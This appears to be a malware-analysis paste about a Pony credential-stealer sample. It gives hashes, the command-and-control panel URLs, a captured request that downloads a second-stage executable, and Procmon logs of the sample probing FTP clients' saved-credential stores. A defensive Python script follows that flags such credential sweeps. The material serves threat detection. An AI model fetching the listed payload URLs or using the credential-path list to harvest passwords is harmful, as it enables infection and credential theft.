Neonprimetime

2018-06-04 #pony panel sample

Jun 6th, 2018
found by @neonprimetime security
#pony panel #opendir

email subject: RE:NEW ORDER

zip
73a60a04f64a3ff34c89ff5810ca8c4d
drops
de3c7069e076dde4b18483e6ce741397
https://www.hybrid-analysis.com/sample/71d8a607ba3fcc2d4a54216717f16ae35fcf3568315ba7cf3e7128540e6ceaae?environmentId=100

NM377737763763673763.exe

----
#opendir #pony panel
----
http://satyainltd.com/panel/
http://satyainltd.com/panel/admin.php

-------
interesting file dropped
-------
C:\Users\Win732\AppData\Local\Temp\11601794.bat


--------
interesting network connections
--------
10:09:25.3720901 AM NM377737763763673763.exe 4740 TCP Disconnect 192.168.113.252:51207 -> 45.122.138.22:80 SUCCESS Length: 0, seqnum: 0, connid: 0 0
25297 25.573368 192.168.113.252 45.122.138.22 HTTP 234 satyainltd.com GET /panel/shit.exe HTTP/1.0
GET /panel/shit.exe HTTP/1.0
Host: satyainltd.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)



---------
interesting registries accessed
---------
10:09:17.8883875 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far\Plugins\FTP\Hosts NAME NOT FOUND Desired Access: Maximum Allowed 4628
10:09:17.8884019 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far2\Plugins\FTP\Hosts NAME NOT FOUND Desired Access: Maximum Allowed 4628
10:09:17.8884112 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far Manager\Plugins\FTP\Hosts NAME NOT FOUND Desired Access: Maximum Allowed 4628
10:09:17.8884204 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far\SavedDialogHistory\FTPHost NAME NOT FOUND Desired Access: Maximum Allowed 4628
10:09:17.8884273 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far2\SavedDialogHistory\FTPHost NAME NOT FOUND Desired Access: Maximum Allowed 4628
10:09:17.8884342 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far Manager\SavedDialogHistory\FTPHost NAME NOT FOUND Desired Access: Maximum Allowed 4628
10:09:17.8884548 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8884633 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8884687 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8884745 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8885038 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8885866 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8886019 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8886076 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8886129 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8886182 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8886366 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8886501 AM NM377737763763673763.exe 4740 RegOpenKey HKLM\Software\Ghisler\Total Commander NAME NOT FOUND Desired Access: Read 4628

------
interesting files accessed
-------

10:09:17.8887963 AM NM377737763763673763.exe 4740 CreateFile C:\Windows\wcx_ftp.ini NAME NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8951000 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8951525 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8952049 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8952454 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8952936 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8953331 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8953765 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8954734 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\CuteFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8955390 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8959301 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8959972 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8960404 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP Pro\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8960852 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8961243 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\GlobalSCAPE\CuteFTP Lite\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8961682 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8963149 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\CuteFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8963917 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8964379 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8964890 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8965302 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP Pro\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8965795 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8966320 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\GlobalSCAPE\CuteFTP Lite\ PATH NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.8966805 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize, Disposition: Open, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: None, AllocationSize: n/a 4628
10:09:17.8967718 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\CuteFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9035099 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9036191 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9037277 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9038189 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9039295 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9040612 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9041753 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9042635 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9043472 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9044444 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9045721 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9046697 AM NM377737763763673763.exe 4740 CreateFile C:\ProgramData\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9048943 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9050075 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
10:09:17.9051005 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory, Synchronous IO Non-Alert, Attributes: n/a, ShareMode: Read, Write, Delete, AllocationSize: n/a 4628
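Added defender-side example, not part of the original paste: the registry and file sections above show one process probing the saved-credential locations of several unrelated FTP clients in quick succession (Far Manager, Total/Windows Commander, CuteFTP, BulletProof FTP, SmartFTP), nearly all returning NAME NOT FOUND / PATH NOT FOUND. The Python below parses Procmon text lines in the layout shown above and flags any process that touches three or more of those client families. The artifact list is assumed to be partial (only what this paste shows), the sample log is a constructed subset of the lines above with shortened detail columns plus one constructed benign explorer.exe line, and the threshold of three families is an assumed tuning value.

```python
import re
from collections import defaultdict

# Procmon text export layout as it appears in the paste:
#   <time> <AM|PM> <image> <pid> <operation> <path> <result> <detail...> <tid>
LINE_RE = re.compile(
    r"^(?P<time>\d{2}:\d{2}:\d{2}\.\d+ [AP]M) "
    r"(?P<image>\S+) (?P<pid>\d+) (?P<op>\S+) "
    r"(?P<path>.+?) (?P<result>SUCCESS|NAME NOT FOUND|PATH NOT FOUND)(?: |$)"
)

# FTP-client credential-store locations seen in the paste, as lower-case
# path substrings. Assumed partial: only what this Procmon excerpt shows.
FTP_CLIENT_ARTIFACTS = [
    ("Far Manager", r"\software\far"),               # Far, Far2, Far Manager
    ("Far Manager", r"\saveddialoghistory\ftphost"),
    ("Total Commander", r"\ghisler"),                # Windows/Total Commander
    ("Total Commander", r"\wcx_ftp.ini"),
    ("CuteFTP", r"\cuteftp"),
    ("BulletProof FTP", r"\bulletproof software"),
    ("SmartFTP", r"\smartftp"),
]

# Constructed sample: a subset of the paste's lines (detail columns shortened)
# plus one constructed benign line where explorer.exe opens a single key.
SAMPLE_LOG = r"""
10:09:17.8883875 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far\Plugins\FTP\Hosts NAME NOT FOUND Desired Access: Maximum Allowed 4628
10:09:17.8884204 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Far\SavedDialogHistory\FTPHost NAME NOT FOUND Desired Access: Maximum Allowed 4628
10:09:17.8884548 AM NM377737763763673763.exe 4740 RegOpenKey HKCU\Software\Ghisler\Windows Commander NAME NOT FOUND Desired Access: Read 4628
10:09:17.8887963 AM NM377737763763673763.exe 4740 CreateFile C:\Windows\wcx_ftp.ini NAME NOT FOUND Desired Access: Read Attributes, Synchronize 4628
10:09:17.8951000 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat PATH NOT FOUND Desired Access: Read Attributes, Synchronize 4628
10:09:17.9035099 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Local\BulletProof Software NAME NOT FOUND Desired Access: Read Data/List Directory 4628
10:09:17.9041753 AM NM377737763763673763.exe 4740 CreateFile C:\Users\Win732\AppData\Roaming\SmartFTP NAME NOT FOUND Desired Access: Read Data/List Directory 4628
10:09:18.0000000 AM explorer.exe 1234 RegOpenKey HKCU\Software\Ghisler\Total Commander SUCCESS Desired Access: Read 1234
"""


def parse_procmon_line(line):
    """Return the fields of one Procmon text line as a dict, or None if it
    does not match the expected layout (blank lines, headers, TCP events)."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def families_for_path(path):
    """Set of FTP-client families whose credential store the path belongs to."""
    p = path.lower()
    return {family for family, needle in FTP_CLIENT_ARTIFACTS if needle in p}


def find_credential_harvesters(lines, min_families=3):
    """Group registry/file probes by (image, pid) and return those that touched
    at least `min_families` distinct FTP-client credential stores.
    Result: {(image, pid): sorted list of family names}."""
    probes = defaultdict(set)
    for line in lines:
        ev = parse_procmon_line(line)
        if ev is None or ev["op"] not in ("RegOpenKey", "CreateFile"):
            continue
        probes[(ev["image"], ev["pid"])] |= families_for_path(ev["path"])
    return {
        key: sorted(fams)
        for key, fams in probes.items()
        if len(fams) >= min_families
    }


if __name__ == "__main__":
    for (image, pid), fams in find_credential_harvesters(SAMPLE_LOG.splitlines()).items():
        print(f"{image} (pid {pid}) probed {len(fams)} FTP-client credential stores: {', '.join(fams)}")
```

A single FTP client reading its own settings (the explorer.exe line) never crosses the threshold; only a process that sweeps several unrelated clients' stores is reported, which is the behaviour that distinguishes a credential stealer from normal use. To run it against a real Procmon export, save the log as text and pass `open(path).read().splitlines()` instead of `SAMPLE_LOG`.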